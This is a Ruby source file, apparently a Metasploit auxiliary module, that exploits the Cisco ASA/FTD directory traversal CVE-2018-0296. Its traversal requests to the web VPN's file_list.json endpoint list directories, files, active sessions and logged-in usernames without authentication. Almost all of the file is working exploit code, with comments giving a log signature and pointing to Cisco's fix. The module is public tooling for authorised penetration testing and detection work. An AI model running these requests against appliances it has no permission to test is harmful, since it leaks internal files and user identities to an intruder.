Path: blob/master/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
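##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that checks a Cisco ASA / FTD web VPN service for the
# directory traversal tracked as CVE-2018-0296 and prints what the
# unauthenticated file-listing endpoint returns.
#
# Every request issued here is an HTTP GET. After the reachability check, each
# probe asks for a URI containing `/+CSCOU+/../+CSCOE+/files/file_list.json`.
# Where the appliance or an upstream proxy records request URIs, that path is
# the signature to search for when reviewing logs for this scan.
# Remediation is the fixed software listed in Cisco's advisory for
# CVE-2018-0296; this module changes nothing on the device.
class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the HTTP options (TARGETURI, SSL, RPORT).
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco ASA Directory Traversal',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
          It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
        },
        'Author' => [
          'Michał Bentkowski', # Discovery
          'Yassine Aboukir', # PoC
          'Shelby Pace' # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-0296' ],
          [ 'EDB', '44956' ]
        ],
        'DisclosureDate' => '2018-06-06',
        # NOTE(review): these are still the placeholder values. The code below
        # only sends GET requests, but the metadata has not been assessed.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        Opt::RPORT(443)
      ]
    )
  end

  # Checks that the target answers on the web VPN logon page and that the body
  # carries one of the strings this module treats as a Cisco web VPN marker.
  #
  # @return [Boolean] true when a response arrived and contains a marker;
  #   false otherwise (the original returned nil when there was no response)
  def is_accessible?
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '+CSCOE+/logon.html')
    )
    return false unless res

    ['SSL VPN Service', '+CSCOE+', '+webvpn+', 'webvpnlogin'].any? do |marker|
      res.body.include?(marker)
    end
  end

  # Requests one listing path and prints the result. A listing that mentions
  # `///sessions` is handed to #get_sessions for per-session follow-up.
  #
  # @param path [String] listing URI, joined onto TARGETURI
  # @return [void]
  def list_files(path)
    list_res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, path)
    )
    return unless list_res && list_res.code == 200

    if list_res.body.match(%r{/{3}sessions})
      get_sessions(list_res.body)
    else
      # NOTE(review): the body is remote-controlled text and is printed as
      # received; treat console output from this module as untrusted.
      print_good(list_res.body)
    end
  end

  # Extracts candidate session numbers (runs of two or more digits) from a
  # sessions listing and, when any are present, looks up their users.
  #
  # @param response [String] body of the sessions listing
  # @return [void]
  def get_sessions(response)
    # No capture group, so scan yields plain strings; uniq prevents requesting
    # the same session path, and reporting the same user, more than once.
    session_nos = response.scan(/[0-9]{2,}/).uniq

    if session_nos.empty?
      print_status("Could not detect any sessions")
      print("\n")
      return
    end

    print_good(response)
    list_users(session_nos)
  end

  # Requests the listing for each session number and prints every `user:NAME`
  # entry found in the responses.
  #
  # @param sessions [Array<String>] session numbers taken from the listing
  # @return [void]
  def list_users(sessions)
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    user_ids = []

    sessions.each do |session_no|
      users_res = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)
      )
      next unless users_res && users_res.body.include?('name')

      # A body can contain 'name' without a `user:` entry. The original pushed
      # an empty string in that case and then reported a blank user.
      user = users_res.body.match(/user:(\w+)/)
      user_ids.push(user.to_s) if user
    end

    if user_ids.empty?
      print_status("There are no users logged in currently")
      return
    end

    print_status('Users logged in:')
    user_ids.each { |id| print_good(id) }
    print("\n")
  end

  # Entry point: confirms the logon page is reachable, then requests the root,
  # sessions and +CSCOE+ listings in that order.
  #
  # @return [void]
  def run
    file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
    sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
    cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'

    unless is_accessible?
      fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
    end

    [file_uri, sessions_uri, cscoe_uri].each { |path| list_files(path) }
  end
end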